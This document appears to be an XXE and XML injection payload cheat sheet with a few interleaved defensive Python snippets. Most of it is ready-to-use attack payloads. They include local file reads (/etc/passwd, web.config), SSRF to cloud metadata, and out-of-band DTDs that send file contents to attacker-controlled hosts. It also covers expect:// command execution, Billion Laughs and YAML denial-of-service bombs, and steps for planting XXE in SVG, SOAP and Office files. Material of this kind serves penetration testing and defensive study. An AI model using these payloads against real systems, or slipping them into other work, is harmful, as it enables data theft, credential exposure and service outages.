XML Injection

XML (Extensible Markup Language) is a way to structure and transfer data between systems. It is similar to JSON, but older and more verbose. Web apps often use XML to communicate with databases, APIs, or other services. XML Injection happens when a web app doesn’t properly validate or sanitize XML input, letting attackers sneak in malicious XML data.

This can lead to data leaks, authentication bypasses, or even full system compromise. For example, if an app processes user-supplied XML without checks, an attacker can inject custom XML tags to manipulate queries, extract hidden data, or even trigger XXE (XML External Entity) attacks, which can expose internal files or allow server-side request forgery (SSRF).

  • XML Injection = Messing with XML data to break an app’s logic and security
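As a minimal sketch of tag injection, assume a hypothetical application that builds a user record by string concatenation. The element names and the build_user_* helpers are invented for illustration and do not come from any real application.

```python
import xml.etree.ElementTree as ET
from xml.sax.saxutils import escape

def build_user_unsafe(name: str) -> str:
    # Hypothetical vulnerable pattern: user input is pasted straight into markup.
    return f"<user><name>{name}</name><role>guest</role></user>"

def build_user_escaped(name: str) -> str:
    # escape() rewrites &, < and > as entities, so the input stays character data.
    return f"<user><name>{escape(name)}</name><role>guest</role></user>"

# Input that closes <name> early and smuggles in an extra <role> element.
payload = "bob</name><role>admin</role><name>x"

unsafe_roles = [r.text for r in ET.fromstring(build_user_unsafe(payload)).iter("role")]
safe_roles = [r.text for r in ET.fromstring(build_user_escaped(payload)).iter("role")]

print(unsafe_roles)  # the injected role element shows up ahead of the real one
print(safe_roles)    # only the role the application itself wrote
```

A consumer that trusts the first role element it finds would treat the unescaped document as an admin record, which is the logic break described above.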

Detecting XML External Entity (XXE) Vulnerability

An XML External Entity attack occurs when an XML parser processes external entities defined in a DTD (Document Type Definition). This allows attackers to read local files, perform SSRF (Server-Side Request Forgery), or execute remote code.

Internal Entity Usage (Safe)

<!-- Internal entity declaration -->
<!DOCTYPE safeExample [
<!ENTITY example "Doe">
]>
<userInfo>
<firstName>John</firstName>
<lastName>&example;</lastName>
</userInfo>

External Entity Exploitation (Vulnerable to XXE)

<!DOCTYPE attack [
<!ENTITY xxe SYSTEM "file:///etc/passwd">
]>
<userInfo>
<firstName>John</firstName>
<lastName>&xxe;</lastName>
</userInfo>

SSRF Attack via XXE

<!DOCTYPE attack [
<!ENTITY xxe SYSTEM "http://attacker.com/malicious">
]>
<userInfo>
<firstName>John</firstName>
<lastName>&xxe;</lastName>
</userInfo>
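The difference between the internal and external declarations above can be checked mechanically. The following is a sketch using Python's standard expat bindings, not a complete filter; find_external_entities is a hypothetical helper name. It lists every entity declared with a SYSTEM identifier and does not fetch anything.

```python
import xml.parsers.expat

def find_external_entities(xml_text: str):
    """Return (name, system_id) for each entity declared with an external identifier."""
    found = []

    def on_entity_decl(name, is_parameter, value, base, system_id, public_id, notation):
        # Internal entities carry a value; external ones carry a system identifier.
        if system_id is not None:
            found.append((name, system_id))

    parser = xml.parsers.expat.ParserCreate()
    parser.EntityDeclHandler = on_entity_decl
    try:
        parser.Parse(xml_text, True)
    except xml.parsers.expat.ExpatError:
        # Declarations seen before a parse error are still reported.
        pass
    return found

safe_doc = '<!DOCTYPE safeExample [<!ENTITY example "Doe">]><userInfo>&example;</userInfo>'
xxe_doc = '<!DOCTYPE attack [<!ENTITY xxe SYSTEM "file:///etc/passwd">]><userInfo>&xxe;</userInfo>'

print(find_external_entities(safe_doc))
print(find_external_entities(xxe_doc))
```

A check like this only flags declarations in the document itself; entities pulled in through a remote DTD would not be visible to it.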

XXE Exploitation Techniques

Extracting sensitive files like /etc/passwd (Linux) or C:\boot.ini (Windows).

<?xml version="1.0"?>
<!DOCTYPE root [
<!ENTITY test SYSTEM 'file:///etc/passwd'>
]>
<root>&test;</root>

<?xml version="1.0"?>
<!DOCTYPE foo [
<!ELEMENT foo ANY>
<!ENTITY xxe SYSTEM "file:///c:/boot.ini">
]>
<foo>&xxe;</foo>

OOB XXE (Out-of-Band Exfiltration)

If direct file output is blocked, attackers can send it to an external server.

<!DOCTYPE foo [
<!ENTITY % remote SYSTEM "http://attacker.com/evil.dtd">
%remote;
]>

evil.dtd file on the attacker’s server

<!ENTITY % file SYSTEM "file:///etc/passwd">
<!ENTITY % all "<!ENTITY send SYSTEM 'http://attacker.com/log?%file;'>">
%all;

Blind XXE (Triggering Requests Without Response)

Used when responses are not reflected but requests are processed. Example write-up: http://nerdint.blogspot.hk/2016/08/blind-oob-xxe-at-uber-26-domains-hacked.html

<!DOCTYPE root [ <!ENTITY xxe SYSTEM "http://attacker.com/log"> ]> <root>&xxe;</root>

Using expect:// for Remote Code Execution (PHP-Specific)

If PHP’s expect:// wrapper is enabled, commands can be executed.

<!DOCTYPE foo [ <!ELEMENT foo ANY> <!ENTITY xxe SYSTEM "expect://id"> ]> <foo>&xxe;</foo>

Classic XXE - Reading Local Files

Used to read system files like /etc/passwd on Linux or C:\boot.ini on Windows.

Linux:

<?xml version="1.0"?>
<!DOCTYPE foo [
<!ELEMENT foo ANY>
<!ENTITY xxe SYSTEM "file:///etc/passwd">
]>
<foo>&xxe;</foo>

Windows:

<?xml version="1.0"?>
<!DOCTYPE foo [
<!ELEMENT foo ANY>
<!ENTITY xxe SYSTEM "file:///c:/boot.ini">
]>
<foo>&xxe;</foo>

Base64 Encoding for Evasion

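If filters block payloads that contain a literal file path, the path itself can be hidden inside a Base64-encoded data:// URI. In the payload for this technique, the Base64 string decodes to file:///etc/passwd, so the target path never appears in clear text, which makes detection harder.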
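The Base64 body of the data:// URI in this section's payload can be decoded to see what it hides. This is a small sketch; decode_data_uri is a hypothetical helper name.

```python
import base64

# The data:// URI taken from this section's payload.
DATA_URI = "data://text/plain;base64,ZmlsZTovLy9ldGMvcGFzc3dk"

def decode_data_uri(uri: str) -> str:
    # Everything after the first comma is the Base64 body of the data URI.
    _, _, body = uri.partition(",")
    return base64.b64decode(body).decode("utf-8")

print(decode_data_uri(DATA_URI))  # file:///etc/passwd
```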

<!DOCTYPE test [
<!ENTITY % init SYSTEM "data://text/plain;base64,ZmlsZTovLy9ldGMvcGFzc3dk">
%init;
]>
<foo/>

PHP Wrapper - Extracting Source Code

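The php://filter wrapper allows attackers to Base64-encode and extract PHP source code. The payload below reads index.php and returns it Base64-encoded, so characters such as < and & in the source do not break XML parsing and the code can be decoded later for analysis.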

<!DOCTYPE replace [
<!ENTITY xxe SYSTEM "php://filter/convert.base64-encode/resource=index.php">
]>
<contacts>
<contact>
<name>Jean &xxe; Dupont</name>
</contact>
</contacts>

SSRF via XXE

Requests the AWS instance metadata endpoint, which can lead to cloud infrastructure compromise.

<!DOCTYPE foo [
<!ELEMENT foo ANY>
<!ENTITY xxe SYSTEM "http://169.254.169.254/latest/meta-data/">
]>
<foo>&xxe;</foo>
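When reviewing logged or submitted payloads, one rough way to spot SSRF-style targets like the metadata address above is to classify the host of each SYSTEM identifier. This is a sketch under stated assumptions: is_internal_target is a hypothetical helper, and hostnames are not resolved, so only literal IP addresses are classified.

```python
import ipaddress
from urllib.parse import urlsplit

def is_internal_target(url: str) -> bool:
    """True when the URL's host is a literal private, loopback, or link-local IP."""
    host = urlsplit(url).hostname
    if host is None:
        return False  # e.g. file:/// URLs carry no host
    try:
        addr = ipaddress.ip_address(host)
    except ValueError:
        # Hostnames are not resolved here; a fuller check would need DNS handling.
        return False
    return addr.is_private or addr.is_loopback or addr.is_link_local

for target in (
    "http://169.254.169.254/latest/meta-data/",
    "http://127.0.0.1/dtd.xml",
    "http://attacker.com/malicious",
):
    print(target, is_internal_target(target))
```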

OOB XXE (Out-of-Band Exploitation)

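Impact: The parser makes a request to an external server (attacker.com), bypassing controls on the direct response. As written, the URL carries only the literal string file:///etc/passwd; sending the file's contents requires the parameter-entity technique shown in the evil.dtd example.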

<!DOCTYPE foo [
<!ELEMENT foo ANY>
<!ENTITY xxe SYSTEM "http://attacker.com/log?data=file:///etc/passwd">
]>
<foo>&xxe;</foo>

Exploiting Public Identifiers

Requests an external payload, allowing remote file inclusion.

<!DOCTYPE foo PUBLIC "Random Text" "http://attacker.com/payload.xml">
<foo>&xxe;</foo>

XInclude Attacks

When you can't modify the DOCTYPE element, you can use XInclude to target local files or internal resources. XInclude allows XML documents to include content from external sources, making it a useful vector for exploiting XXE vulnerabilities.

<foo xmlns:xi="http://www.w3.org/2001/XInclude">
<xi:include parse="text" href="file:///etc/passwd"/>
</foo>

<foo xmlns:xi="http://www.w3.org/2001/XInclude">
<xi:include parse="text" href="file:///C:/Windows/win.ini"/>
</foo>

<foo xmlns:xi="http://www.w3.org/2001/XInclude">
<xi:include parse="text" href="http://malicious.com/payload.xml"/>
</foo>
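Because XInclude needs no DOCTYPE, checks that only look for DTDs miss it. The following sketch lists the href of every xi:include element; xinclude_targets is a hypothetical helper. It relies on the fact that Python's ElementTree does not resolve XInclude unless ElementInclude is called explicitly, so parsing only inspects the markup.

```python
import xml.etree.ElementTree as ET

# Tag name in ElementTree's {namespace}local form.
XINCLUDE_TAG = "{http://www.w3.org/2001/XInclude}include"

def xinclude_targets(xml_text: str):
    """Return the href of every xi:include element without resolving any of them."""
    root = ET.fromstring(xml_text)
    return [el.get("href") for el in root.iter(XINCLUDE_TAG)]

doc = (
    '<foo xmlns:xi="http://www.w3.org/2001/XInclude">'
    '<xi:include parse="text" href="file:///etc/passwd"/>'
    "</foo>"
)
print(xinclude_targets(doc))
```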

Exploiting XXE to Perform SSRF Attacks

XXE (XML External Entity) vulnerabilities can be combined with SSRF (Server-Side Request Forgery) to access internal services and extract sensitive information.

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE foo [
<!ELEMENT foo ANY >
<!ENTITY xxe SYSTEM "http://internal.service/secret_pass.txt" >
]>
<foo>&xxe;</foo>

<?xml version="1.0"?>
<!DOCTYPE data [
<!ENTITY % remote SYSTEM "http://internal.service/admin">
%remote;
]>
<data>&remote;</data>

<?xml version="1.0"?>
<!DOCTYPE test [
<!ENTITY % payload SYSTEM "http://attacker.com/evil.dtd">
%payload;
]>
<test>&payload;</test>

Exploiting XXE to Perform a Denial of Service (DoS)

These attacks can crash services or entire servers. Do not use them in production environments.

Quadratic Blowup Attack

Unlike the Billion Laughs attack, which nests entities many levels deep, this payload repeats a single large entity many times. The expanded size grows roughly with the square of the input size, causing extreme processing delays and memory consumption.

<!DOCTYPE data [
<!ENTITY x "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA">
<!ENTITY y "&x;&x;&x;&x;&x;&x;&x;&x;&x;&x;&x;&x;&x;&x;&x;&x;&x;&x;&x;&x;">
]>
<data>&y;&y;&y;&y;&y;&y;&y;&y;&y;&y;&y;&y;&y;&y;&y;&y;&y;&y;&y;&y;</data>
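The growth can be estimated with simple arithmetic. The sketch below uses a simplified single-entity form (one entity named x, referenced many times) rather than the exact two-level payload above; quadratic_blowup_sizes is a hypothetical helper and the sizes are approximations that ignore surrounding markup.

```python
def quadratic_blowup_sizes(entity_len: int, references: int):
    """Approximate input and expanded sizes for one entity referenced many times."""
    ref_len = len("&x;")
    input_size = entity_len + references * ref_len  # entity value plus the references
    expanded_size = entity_len * references         # every reference expands in full
    return input_size, expanded_size

for n in (1_000, 10_000, 100_000):
    inp, out = quadratic_blowup_sizes(n, n)
    print(f"entity={n:>7} chars  input~{inp:>8}  expanded={out:>12}")
```

Doubling both the entity length and the reference count doubles the input but quadruples the expanded output, which is why entity-depth limits alone do not stop this variant.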

YAML Recursive Reference Bomb

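This YAML payload is the YAML counterpart of the Billion Laughs attack. It uses nested anchors and aliases rather than true cycles: each level references the previous one nine times, so fully expanding i yields 9^9 (about 387 million) strings, leading to excessive memory usage in consumers that copy or serialize the structure.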

x: &x
y: *x
a: &a ["lol","lol","lol","lol","lol","lol","lol","lol","lol"]
b: &b [*a,*a,*a,*a,*a,*a,*a,*a,*a]
c: &c [*b,*b,*b,*b,*b,*b,*b,*b,*b]
d: &d [*c,*c,*c,*c,*c,*c,*c,*c,*c]
e: &e [*d,*d,*d,*d,*d,*d,*d,*d,*d]
f: &f [*e,*e,*e,*e,*e,*e,*e,*e,*e]
g: &g [*f,*f,*f,*f,*f,*f,*f,*f,*f]
h: &h [*g,*g,*g,*g,*g,*g,*g,*g,*g]
i: &i [*h,*h,*h,*h,*h,*h,*h,*h,*h]

Deeply Nested XML Bomb

This attack uses deep recursion instead of entity expansion, forcing the XML parser to exceed stack depth limits.

<data>
<item>
<item>
<item>
<item>
<item>
<item>
<item>
<item>
<item>
<item>Deep recursion attack!</item>
</item>
</item>
</item>
</item>
</item>
</item>
</item>
</item>
</item>
</data>
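A parser can be protected against this by tracking nesting depth while streaming. The following is a sketch using Python's expat bindings; max_depth, DepthExceeded, and the default limit of 1000 are illustrative choices, not values from the source.

```python
import xml.parsers.expat

class DepthExceeded(Exception):
    """Raised when element nesting goes beyond the configured limit."""

def max_depth(xml_text: str, limit: int = 1000) -> int:
    depth = 0
    deepest = 0

    def start(name, attrs):
        nonlocal depth, deepest
        depth += 1
        deepest = max(deepest, depth)
        if depth > limit:
            # Abort as soon as the limit is crossed instead of parsing to the end.
            raise DepthExceeded(f"nesting deeper than {limit}")

    def end(name):
        nonlocal depth
        depth -= 1

    parser = xml.parsers.expat.ParserCreate()
    parser.StartElementHandler = start
    parser.EndElementHandler = end
    parser.Parse(xml_text, True)
    return deepest

# Same shape as the payload above: <data> wrapping ten nested <item> elements.
doc = "<data>" + "<item>" * 10 + "Deep recursion attack!" + "</item>" * 10 + "</data>"
print(max_depth(doc))
```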

Billion Laughs Attack

<!DOCTYPE data [
<!ENTITY a0 "dos" >
<!ENTITY a1 "&a0;&a0;&a0;&a0;&a0;&a0;&a0;&a0;&a0;&a0;">
<!ENTITY a2 "&a1;&a1;&a1;&a1;&a1;&a1;&a1;&a1;&a1;&a1;">
<!ENTITY a3 "&a2;&a2;&a2;&a2;&a2;&a2;&a2;&a2;&a2;&a2;">
<!ENTITY a4 "&a3;&a3;&a3;&a3;&a3;&a3;&a3;&a3;&a3;&a3;">
]>
<data>&a4;</data>
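The expanded size of a nested-entity payload can be computed without expanding it. The sketch below generates declarations of the same shape as the payload above (assuming ten references per level) and sums the lengths recursively; billion_laughs_dtd and expansion_lengths are hypothetical helpers, and cyclic definitions are not handled.

```python
import re
from functools import lru_cache

ENTITY_RE = re.compile(r'<!ENTITY\s+(\w+)\s+"([^"]*)"\s*>')
REF_RE = re.compile(r"&(\w+);")

def billion_laughs_dtd(levels: int, fanout: int) -> str:
    """Build a0..a<levels>, each level referencing the previous one fanout times."""
    lines = ['<!ENTITY a0 "dos">']
    for i in range(1, levels + 1):
        refs = f"&a{i - 1};" * fanout
        lines.append(f'<!ENTITY a{i} "{refs}">')
    return "\n".join(lines)

def expansion_lengths(dtd: str):
    """Map each entity name to the length of its fully expanded value."""
    entities = dict(ENTITY_RE.findall(dtd))

    @lru_cache(maxsize=None)
    def length(name: str) -> int:
        value = entities[name]
        literal = len(REF_RE.sub("", value))  # characters that are not references
        return literal + sum(length(ref) for ref in REF_RE.findall(value))

    return {name: length(name) for name in entities}

sizes = expansion_lengths(billion_laughs_dtd(levels=4, fanout=10))
print(sizes)  # each level is ten times the previous one
```

With four levels the final entity expands to 30,000 characters; every additional level multiplies that by ten, so nine or ten levels reach gigabytes from a payload of under a kilobyte.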

Parameters Laugh Attack

A variant of the Billion Laughs attack, this technique leverages delayed interpretation of parameter entities, causing excessive memory consumption and processing delays in XML parsers.

<!DOCTYPE r [
<!ENTITY % pe_1 "<!---->">
<!ENTITY % pe_2 "&#37;pe_1;<!---->&#37;pe_1;">
<!ENTITY % pe_3 "&#37;pe_2;<!---->&#37;pe_2;">
<!ENTITY % pe_4 "&#37;pe_3;<!---->&#37;pe_3;">
%pe_4;
]>
<r/>

Exploiting Error-Based XXE

Error-based XML External Entity (XXE) attacks rely on forcing the application to disclose error messages, which can leak sensitive file contents or system information.

Using Local DTD for Error-Based Exfiltration

If error-based exfiltration is possible, a local DTD file can be used for concatenation tricks. First confirm that error messages expose file names by referencing a path that does not exist:

<!DOCTYPE root [
<!ENTITY % local_dtd SYSTEM "file:///abcxyz/">
%local_dtd;
]>
<root></root>

Advanced Error-Based XXE: Reading File Contents via Error Messages

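By referencing a nonexistent file whose path embeds the contents of another file, attackers can trick the XML parser into leaking parts of that file through error messages. Parsers that follow the XML specification reject parameter-entity references inside declarations in the internal subset, so in practice these declarations usually have to be delivered through an external or local DTD.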

<!DOCTYPE root [
<!ENTITY % file SYSTEM "file:///etc/passwd">
<!ENTITY % int "<!ENTITY exfil SYSTEM 'file:///nonexistent/%file;'>">
%int;
]>
<root>&exfil;</root>

Error-Based XXE via OOB (Out-Of-Band) Exfiltration

If error messages do not disclose enough information, but DNS or HTTP requests are allowed, file contents can be exfiltrated using an external DTD.

<!DOCTYPE root [
<!ENTITY % ext SYSTEM "http://attacker.com/malicious.dtd">
%ext;
]>
<root></root>

List DTDs and generate XXE payloads using those local DTDs.

Linux Local DTD Exploitation

A list of existing DTD files on Linux can be found by running locate .dtd. The fonts.dtd file contains an injectable entity %constant at line 148, making it a potential attack vector.

/usr/share/xml/fontconfig/fonts.dtd
/usr/share/xml/scrollkeeper/dtds/scrollkeeper-omf.dtd
/usr/share/xml/svg/svg10.dtd
/usr/share/xml/svg/svg11.dtd
/usr/share/yelp/dtd/docbookx.dtd

Local File Disclosure (Linux)

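This payload leverages fonts.dtd to exfiltrate the contents of /etc/passwd. The same approach reads other sensitive files (.bash_history, .ssh/id_rsa). It redefines %constant so that the parser tries to open a nonexistent path under /tmp/leak/ that embeds the file contents, which then appear in the resulting error message.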

<!DOCTYPE message [
<!ENTITY % local_dtd SYSTEM "file:///usr/share/xml/fontconfig/fonts.dtd">
<!ENTITY % constant 'aaa)>
<!ENTITY &#x25; file SYSTEM "file:///etc/passwd">
<!ENTITY &#x25; eval "<!ENTITY &#x26;#x25; error SYSTEM
&#x27;file:///tmp/leak/&#x25;file;&#x27;>">
&#x25;eval;
&#x25;error;
<!ELEMENT aa (bb'>
%local_dtd;
]>
<message>Text</message>

Windows Local DTD Exploitation

Common Windows local DTD files that can be abused

C:\Windows\System32\wbem\xml\cim20.dtd

Local File Disclosure (Windows)

Uses cim20.dtd to read sensitive files (web.config, php.ini).

<!DOCTYPE doc [
<!ENTITY % local_dtd SYSTEM "file:///C:\Windows\System32\wbem\xml\cim20.dtd">
<!ENTITY % SuperClass '>
<!ENTITY &#x25; file SYSTEM "file://D:\webserv2\services\web.config">
<!ENTITY &#x25; eval "<!ENTITY &#x26;#x25; error SYSTEM
&#x27;file://t/#&#x25;file;&#x27;>">
&#x25;eval;
&#x25;error;
<!ENTITY test "test"'
>
%local_dtd;
]>
<xxx>anything</xxx>

Triggering the XXE Vulnerability

The XXE payload fetches a malicious remote DTD from attacker.com. The SYSTEM keyword loads an external DTD. If the parser supports external entities, ext.dtd will be processed.

<?xml version="1.0" ?>
<!DOCTYPE message [
<!ENTITY % ext SYSTEM "http://attacker.com/ext.dtd">
%ext;
]>
<message></message>
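Whether a parser supports external entities is a configuration matter. As an illustration for one specific stack, Python's standard xml.sax parser (an assumption; the source does not name a parser), the relevant feature flags can be read and switched off. The helper names below are hypothetical.

```python
import xml.sax
from xml.sax.handler import feature_external_ges, feature_external_pes

def external_entity_settings():
    """Report whether a default SAX parser resolves external entities."""
    parser = xml.sax.make_parser()
    return {
        "external_ges": bool(parser.getFeature(feature_external_ges)),  # general entities
        "external_pes": bool(parser.getFeature(feature_external_pes)),  # parameter entities
    }

def hardened_parser():
    """Return a SAX parser with external entity resolution explicitly disabled."""
    parser = xml.sax.make_parser()
    parser.setFeature(feature_external_ges, False)
    parser.setFeature(feature_external_pes, False)
    return parser

print(external_entity_settings())
```

Setting the flags explicitly avoids depending on interpreter defaults, which have changed between Python releases.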

Malicious DTD Content - Extracting /etc/passwd

1: Using an Error-Based Technique

Defines an entity %file to read /etc/passwd.
Defines %eval, which creates another entity (%error).
Triggers an error by requesting a nonexistent file, appending /etc/passwd content.
If the application includes error messages in HTTP responses, the file contents leak.

<!ENTITY % file SYSTEM "file:///etc/passwd">
<!ENTITY % eval "<!ENTITY &#x25; error SYSTEM 'file:///nonexistent/%file;'>">
%eval;
%error;

2: Alternative Exfiltration via URL Encoding

%data; loads /etc/passwd.
%eval; builds a new entity %leak;.
%leak; references the leaked file content in the error message.

<!ENTITY % data SYSTEM "file:///etc/passwd">
<!ENTITY % eval "<!ENTITY &#x25; leak SYSTEM '%data;:///'>">
%eval;
%leak;

Blind XXE - Exfiltrating Data Out of Band (OOB)

When an application does not return XML parsing errors or output, Out-of-Band (OOB) XXE can be used to extract data. If the application is vulnerable, it will make a request to burpcollaborator.net, confirming XXE exploitation potential.

Basic Blind XXE with Burp Collaborator

To detect blind XXE, try requesting an external resource (e.g., Burp Collaborator).

<?xml version="1.0" ?>
<!DOCTYPE root [
<!ENTITY % ext SYSTEM
"http://UNIQUE_ID_FOR_BURP_COLLABORATOR.burpcollaborator.net/x">
%ext;
]>
<r></r>

Exfiltrating /etc/passwd via HTTP Request

%xxe; reads /etc/passwd.
&callhome; sends the first line of /etc/passwd to www.malicious.com.

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE foo [
<!ELEMENT foo ANY >
<!ENTITY % xxe SYSTEM "file:///etc/passwd">
<!ENTITY callhome SYSTEM "http://www.malicious.com/?%xxe;">
]>
<foo>&callhome;</foo>

OOB XXE Attack (Yunusov, 2013)

<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE data SYSTEM "http://publicServer.com/parameterEntity_oob.dtd">
<data>&send;</data>

Remote DTD File (parameterEntity_oob.dtd)

The external DTD loads file:///sys/power/image_size.

&send; sends its content to publicServer.com.

<!ENTITY % file SYSTEM "file:///sys/power/image_size">
<!ENTITY % all "<!ENTITY send SYSTEM 'http://publicServer.com/?%file;'>">
%all;

XXE OOB with PHP Filters

Bypassing direct file access using PHP’s base64 encoding

<?xml version="1.0" ?>
<!DOCTYPE r [
<!ELEMENT r ANY >
<!ENTITY % sp SYSTEM "http://127.0.0.1/dtd.xml">
%sp;
%param1;
]>
<r>&exfil;</r>

Malicious DTD File (dtd.xml)

php://filter encodes /etc/passwd in base64.

&exfil; sends it to 127.0.0.1/dtd.xml.

<!ENTITY % data SYSTEM "php://filter/convert.base64-encode/resource=/etc/passwd">
<!ENTITY % param1 "<!ENTITY exfil SYSTEM 'http://127.0.0.1/dtd.xml?%data;'>">
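On the receiving side, the Base64 data arrives as the query string of the logged request. The sketch below recovers it, assuming the request path is available as a string such as /dtd.xml?<base64>; decode_exfil is a hypothetical helper, and the sample line is made up for the demonstration.

```python
import base64
from urllib.parse import urlsplit

def decode_exfil(request_path: str) -> str:
    """Decode the Base64 blob that follows '?' in a logged request path."""
    query = urlsplit(request_path).query
    # Restore any padding that was stripped in transit.
    padded = query + "=" * (-len(query) % 4)
    return base64.b64decode(padded).decode("utf-8", errors="replace")

# Self-made sample: encode a line, then decode it back from a fake request path.
sample = base64.b64encode(b"root:x:0:0:root:/root:/bin/bash\n").decode("ascii")
print(decode_exfil("/dtd.xml?" + sample))
```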

Apache Karaf CVE-2018-11788 XXE OOB

Vulnerable Apache Karaf versions: ≤ 4.2.1, ≤ 4.1.6

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE doc [
<!ENTITY % dtd SYSTEM "http://27av6zyg33g8q8xu338uvhnsc.canarytokens.com">
%dtd;
]>
<features name="my-features" xmlns="http://karaf.apache.org/xmlns/features/v1.3.0"
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
xsi:schemaLocation="http://karaf.apache.org/xmlns/features/v1.3.0
http://karaf.apache.org/xmlns/features/v1.3.0">
<feature name="deployer" version="2.0" install="auto">
</feature>
</features>

WAF Bypasses and XXE Exploitation Techniques

XML parsers use four methods to detect encoding:

  1. HTTP Content-Type
Content-Type: text/xml; charset=utf-8
  2. Reading the Byte Order Mark (BOM)
  3. Reading the first bytes of the document
UTF-8: 3C 3F 78 6D
UTF-16BE: 00 3C 00 3F
UTF-16LE: 3C 00 3F 00
  4. XML Declaration:
<?xml version="1.0" encoding="UTF-8"?>
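The byte patterns listed above are simply the first characters of an XML declaration in each encoding. The following sketch matches on them the way a parser might before reading the declaration; sniff_encoding is a hypothetical helper, the BOM values are the standard ones for UTF-8 and UTF-16, and UTF-32 and other encodings are left out.

```python
# Checked in order: byte order marks first, then the leading bytes of the declaration.
SIGNATURES = [
    (b"\xef\xbb\xbf", "UTF-8 (BOM)"),
    (b"\xfe\xff", "UTF-16BE (BOM)"),
    (b"\xff\xfe", "UTF-16LE (BOM)"),
    (b"\x00\x3c\x00\x3f", "UTF-16BE"),
    (b"\x3c\x00\x3f\x00", "UTF-16LE"),
    (b"\x3c\x3f\x78\x6d", "UTF-8"),  # also matches other ASCII-compatible encodings
]

def sniff_encoding(data: bytes) -> str:
    """Guess a document's encoding from its first bytes."""
    for prefix, label in SIGNATURES:
        if data.startswith(prefix):
            return label
    return "unknown"

declaration = '<?xml version="1.0"?><r/>'
for codec in ("utf-8", "utf-16-be", "utf-16-le"):
    print(codec, sniff_encoding(declaration.encode(codec)))
```

This matters for WAF bypasses because a filter that only inspects the body as UTF-8 text will not recognize a DOCTYPE that the backend parser happily decodes from UTF-16.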

XXE Exploitation Techniques

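An endpoint that accepts JSON may also accept the same data as XML when the Content-Type header is changed. An XML parser error in the response, such as the last line below, suggests that the body is being handled by an XML parser.

application/json: {"search":"name","value":"test"}
application/xml: <?xml version="1.0" encoding="UTF-8" ?><root><search>name</search><value>data</value></root>
{ "errors":{ "errorMessage":"org.xml.sax.SAXParseException: XML document structures must start and end within the same entity." } }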
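Converting a flat JSON body into the equivalent XML body can be scripted. This is a sketch that only handles flat objects with string-like values; json_to_xml and the root element name are assumptions, since the real element names depend on what the target endpoint expects.

```python
import json
import xml.etree.ElementTree as ET

def json_to_xml(body: str, root_tag: str = "root") -> str:
    """Convert a flat JSON object into an XML document with one child per key."""
    data = json.loads(body)
    root = ET.Element(root_tag)
    for key, value in data.items():
        child = ET.SubElement(root, key)
        child.text = str(value)
    return ET.tostring(root, encoding="unicode")

print(json_to_xml('{"search":"name","value":"test"}'))
```

The resulting body would be sent with Content-Type: application/xml in place of application/json.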

XXE Inside Exotic Files

<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" width="300" version="1.1" height="200">
<image xlink:href="expect://ls" width="200" height="200"></image>
</svg>

Classic Exploit

<?xml version="1.0" standalone="yes"?>
<!DOCTYPE test [ <!ENTITY xxe SYSTEM "file:///etc/hostname" > ]>
<svg width="128px" height="128px" xmlns="http://www.w3.org/2000/svg"
xmlns:xlink="http://www.w3.org/1999/xlink" version="1.1">
<text font-size="16" x="0" y="16">&xxe;</text>
</svg>

Out-of-Band (OOB) XXE via SVG Rasterization

<?xml version="1.0" standalone="yes"?>
<!DOCTYPE svg [
<!ELEMENT svg ANY >
<!ENTITY % sp SYSTEM "http://example.org:8080/xxe.xml">
%sp;
%param1;
]>
<svg viewBox="0 0 200 200" version="1.2" xmlns="http://www.w3.org/2000/svg" style="fill:red">
<text x="15" y="100" style="fill:black">XXE via SVG rasterization</text>
</svg>

XXE Inside SOAP

<soap:Body>
<foo>
<![CDATA[<!DOCTYPE doc [<!ENTITY % dtd SYSTEM "http://x.x.x.x:22/"> %dtd;]><xxx/>]]>
</foo>
</soap:Body>

XXE Inside Office Files

Inject XXE payload into .xml files within a .docx:

/word/document.xml
/ppt/presentation.xml
/xl/workbook.xml
/_rels/.rels
[Content_Types].xml

Update the ZIP file:

zip -u xxe.docx [Content_Types].xml

Tool XXE in XLSX

7z x -oXXE xxe.xlsx
cd XXE
zip -u ../xxe.xlsx *
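Since Office files are ZIP archives of XML parts, an uploaded file can be screened for DOCTYPE declarations before it reaches a parser. This is a sketch, not a complete scanner: parts_with_doctype is a hypothetical helper, only the first 4096 bytes of each part are checked, and parts encoded as UTF-16 would slip past a plain byte search.

```python
import zipfile

def parts_with_doctype(path: str):
    """List XML parts inside an Office file that contain a DOCTYPE declaration."""
    hits = []
    with zipfile.ZipFile(path) as archive:
        for name in archive.namelist():
            if not name.endswith((".xml", ".rels")):
                continue
            # A DOCTYPE has to come before the root element, so the head is enough.
            head = archive.read(name)[:4096]
            if b"<!DOCTYPE" in head:
                hits.append(name)
    return hits
```

Genuine Office documents do not normally carry a DOCTYPE in these parts, so any hit is worth a closer look.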

Inject Payload in xl/workbook.xml

<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<!DOCTYPE cdl [<!ELEMENT cdl ANY ><!ENTITY % asd SYSTEM
"http://x.x.x.x:8000/xxe.dtd">%asd;%c;]>
<cdl>&rrr;</cdl>

Or inject in xl/sharedStrings.xml:

<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<!DOCTYPE cdl [<!ELEMENT t ANY ><!ENTITY % asd SYSTEM
"http://x.x.x.x:8000/xxe.dtd">%asd;%c;]>
<sst xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" count="10"
uniqueCount="10">
<si><t>&rrr;</t></si>
</sst>
